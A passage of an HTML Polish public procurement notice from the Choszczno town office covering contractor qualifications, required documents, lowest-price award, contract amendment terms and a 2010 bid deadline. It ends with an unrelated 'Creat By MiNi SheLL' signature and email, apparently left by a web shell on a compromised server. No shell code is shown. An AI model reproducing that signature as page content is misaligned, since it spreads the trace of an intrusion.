b)	dysponują lub będą dysponować  pracownikami o specjalności ogólnobudowlanej, specjaliści budowy dróg i chodników o nawierzchni z kostki betonowej lub brukowej,
c)	kierownik budowy musi posiadać stwierdzenie przygotowania zawodowego do wykonywania samodzielnych funkcji w budownictwie (uprawnienia), wpis na listę właściwej Okręgowej Izby Inżynierów Budownictwa,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	dla zabezpieczenia bieżącego wykonywania robót posiadają środki własne lub dostęp do kredytu w wysokości minimum 300.000 zł, 
b)	posiadają ubezpieczenie OC z tytułu prowadzonej działalności gospodarczej;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	W celu stwierdzenia, czy osoba podpisująca oświadczenia woli lub udzielająca pełnomocnictwa posiada do tego uprawnienia, do oferty należy załączyć aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
2)	W przypadku wykonawców wspólnie ubiegających się o zamówienie, do oferty należy załączyć pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, 
3)	Harmonogram rzeczowo - finansowy realizacji i rozliczania wykonanych robot opracowany na podstawie procentowego harmonogramu rzeczowo - finansowego będącego załącznikiem 1a do  specyfikacji i według wytycznych określonych w rozdz. IV pkt. 4 SIWZ.
4)	Kosztorys ofertowy opracowany metodą uproszczoną wraz z zestawieniem cen jednostkowych materiałów, czynników produkcji tj. stawka rbh, kosztów pośrednich, kosztów zaopatrzenia i zysku oraz stawki jednostkowej pracy podstawowego sprzętu i urządzeń, które wykonawca będzie używał do wykonania przedmiotu zamówienia.


5)	Wykaz części zamówienia, które wykonawca zamierza zlecić do wykonania podwykonawcom.
6)	Certyfikaty zgodności z normami PN-EN 1176 (Wyposażenie placów zabaw) i PN - EN 1177 (Nawierzchnie placów zabaw amortyzujące upadki. Wymagania bezpieczeństwa i metody badań.) na wszystkie urządzenia zabawowe przedstawione w ofercie.7)	Rysunki urządzeń zabawowych, urządzeń małej architektury wraz z opisem lub zdjęcia wraz z opisem lub karty technologiczne proponowanych urządzeń.
8)	Oświadczenie i informacja wykonawcy o sposobie utylizacji lub przekazania do utylizacji materiałów pochodzących z rozbiórki dla innego podmiotu wraz ze wskazaniem miejsca i sposobu utylizacji lub innego wykorzystania tych materiałów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu Stron wyrażoną na piśmie pod rygorem nieważności.
2. Niedopuszczalna jest zmiana postanowień zawartej umowy oraz wprowadzanie do umowy postanowień niekorzystnych dla Zamawiającego.
3. Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy w formie pisemnego aneksu na następujących warunkach :
1)	Wykonawca może dokonywać zmiany kluczowych specjalistów, przedstawionych w ofercie ,jedynie za uprzednią pisemną zgodą Zamawiającego, akceptującego nowego kluczowego specjalistę.
2)	Wykonawca z własnej inicjatywy proponuje zmianę kluczowych specjalistów  w następujących przypadkach:
a)	śmierci, choroby lub zdarzeń losowych kluczowego specjalisty,
b)	nie wywiązywania się kluczowego specjalisty z obowiązków wynikających   z umowy.
3)	Jeżeli zmiana kluczowego specjalisty stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od wykonawcy (np. rezygnacji itp.),
4)	Zamawiający może zażądać od wykonawcy zmiany kluczowego specjalisty, jeżeli uzna, że kluczowy  specjalista nie wykonuje swoich obowiązków wynikających z umowy. Wykonawca obowiązany jest zmienić  kluczowego specjalistę zgodnie z żądaniem Zamawiającego w terminie wskazanym we wniosku Zamawiającego. W przypadku zmiany kluczowego specjalisty  nowy kluczowy specjalista musi spełniać wymagania określone dla danego specjalisty.
5)	Wykonawca może przedłużyć termin wykonania przedmiotu umowy o czas opóźnienia  Zamawiającego, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w wykonaniu następujących zobowiązań:
a)	przekazania terenu budowy,
b)	przekazania dokumentacji budowy (pozwolenia na budowę, dokumentacji projektowej, specyfikacji technicznych,  innych wymaganych przepisami, do których zamawiający był zobowiązany),
c)	przekazania dokumentów zamiennych budowy lub usunięcia wad w dostarczanej dokumentacji projektowej,
d)	zmiany terminu dokonania prób końcowych i wniosków o dokonanie prób dodatkowych nieobjętych umową,
e)	zmiany terminu dokonania odbiorów przewidzianych w umowie.
6)	Wykonawca może przedłużyć termin wykonania przedmiotu umowy o czas opóźnienia, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w przypadku:
a)	zawieszenia robót przez Zamawiającego,
b)	wykopalisk uniemożliwiających wykonanie robót,
c)	szczególnie niesprzyjających warunków  atmosferycznych uniemożliwiających prowadzenie robót budowlanych,  przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów,
d)	siły wyższej, klęski żywiołowej
e)	jakiegokolwiek opóźnienia, utrudnienia lub przeszkody  spowodowane przez lub dających się przypisać Zamawiającemu lub innemu  wykonawcy zatrudnionemu  przez Zamawiającego na terenie budowy,
f)	niewypałów i niewybuchów,
g)	wykopalisk archeologicznych nieprzewidywanych w siwz,
h)	odmiennych od przyjętych w dokumentacji projektowej warunków  geologicznych (kategorie gruntu, kurzawka  itp.),
i)	odmiennych od przyjętych w dokumentacji projektowej warunków terenowych, w szczególności  istnienie  podziemnych urządzeń, instalacji lub obiektów  infrastrukturalnych,
j)	  zmiany się w trakcie wykonywania umowy przepisów, norm lub normatywów mających zastosowanie do przedmiotu  umowy, lub tych zmian dokona Zamawiający,
k)	jeżeli jednostki administracji nie zachowają wymaganych zgodnie z obowiązującymi przepisami terminów odpowiedzi na wnioski, 
7)	Jeżeli wystąpią zmiany będące następstwem okoliczności leżących po stronie Zamawiającego , w szczególności :
a)	wstrzymanie robót przez  Zamawiającego,
b)	konieczności  usunięcia błędów lub wprowadzenia zmian w dokumentacji  projektowej.
8)	Jeżeli powstaną okoliczności będące następstwem działania  organów administracji, w szczególności:
a)	przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji,  zezwoleń  itp.,
b)	odmowa wydania przez organy administracji wymaganych  decyzji, zezwoleń,  uzgodnień na skutek błędów w dokumentacji projektowej.
9)	Jeżeli powstały konieczne zmiany  technologiczne, w szczególności :
a)	konieczności zrealizowania  projektu  przy  zastosowaniu innych  rozwiązań  technicznych/technologicznych  niż wskazane w dokumentacji  projektowej w sytuacji, gdyby zastosowanie przewidzianych  rozwiązań  groziłoby niewykonaniem  lub wadliwym  wykonaniem  projektu,
b)	odmienne od przyjętych w dokumentacji  projektowej  warunki  geologiczne   (kategorie gruntu, kurzawa itp.) skutkujące  niemożliwością  zrealizowania przedmiotu umowy  przy dotychczasowych założeniach  technologicznych,
c)	odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w szczególności istnienie podziemnych  urządzeń instalacji  lub  obiektów infrastrukturalnych,     
d)	konieczności zrealizowania projektu przy  zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego  prawa.
Zmiany wskazywane w lit d będą wprowadzone wyłącznie w zakresie  umożliwiającym  oddanie przedmiotu  umowy do użytkowania, a  Zamawiający  może ponieść ryzyko zwiększanym z tego powodu  kosztom. Każde ze wskazanych  w lit. a -d  zmian  może  być powiązane ze zmianą  wynagrodzenia na zasadach określonych  przez strony.
10)	Pozostałe zmiany 
a)	jeśli zmiana stawki podatku VAT będzie  powodować  zwiększenie  kosztów  wykonania  po stronie  wykonawcy, Zamawiający  dopuszcza  możliwość zwiększenia  wynagrodzenia  o kwotę równą różnicy  w kwocie  podatku  VAT  zapłaconego  przez  wykonawcę, 
b)	jeśli  zmiana  stawki VAT  będzie powodować zmniejszenie  kosztów wykonania  umowy  po  stronie wykonawcy, Zamawiający  przewiduje  możliwość  zmniejszenia  wynagrodzenia o kwotę stanowiącą różnicę  kwoty podatku  VAT  do zapłacenia  przez  wykonawcę ,
c)	 rezygnacja  przez  zamawiającego z realizacji części   przedmiotu  umowy - w takim przypadku  wynagrodzenie  przysługujące  wykonawcy  zostanie  pomniejszone, przy  czym  Zamawiający  zapłaci za  wszystkie  spełnione  świadczenia  oraz udokumentowane  koszty,  które  wykonawca  poniósł w związku z wynikającymi z umowy  planowanymi  świadczeniami,
d)	kolizja z planowanymi  lub równolegle prowadzonymi przez inne  podmioty inwestycjami - w takim  przypadku  zmiany  w umowie  zostaną ograniczone  do zmian  koniecznych powodujących  uniknięcie  kolizji, a  wynagrodzenie  zostanie  ustalone z zachowaniem  zasady opisanej w specyfikacji i ofercie wykonawcy,
4. Zmiana umowy nastąpić może z inicjatywy Zamawiającego albo Wykonawcy poprzez przedstawienie drugiej stronie propozycji zmian w formie pisemnej, które powinny zawierać: 
1)	opis zmiany,
2)	uzasadnienie zmiany,
3)	koszt zmiany oraz jego wpływ na wysokość wynagrodzenia,
4)	czas wykonania zmiany oraz wpływ zmiany na termin zakończenia umowy.
5. Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie powstałych okoliczności w formie opisowej i właściwie umotywowanej (protokół wraz z uzasadnieniem) przez powołaną przez Zamawiającego komisję techniczną, w składzie której będą m.in. Inżynier Kontraktu oraz Kierownik budowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.choszczno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Choszcznie, ul. Wolności 24, 73-200 Choszczno, pok. 27.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2010 godzina 10:00, miejsce: kancelaria ogólna Urzędu Miejskiego w Choszcznie, ul. Wolności 24, 73-200 Choszczno.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Współfinansowanie projektu w ramach Regionalnego Programu
Operacyjnego Województwa Zachodniopomorskiego na lata 2007 - 2013.
Oś priorytetowa 5. Turystyka, Kultura i rewitalizacja. Działanie 5.1 Infrastruktura Turystyczna. Poddziałanie 5.1.1 Infrastruktura Turystyki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com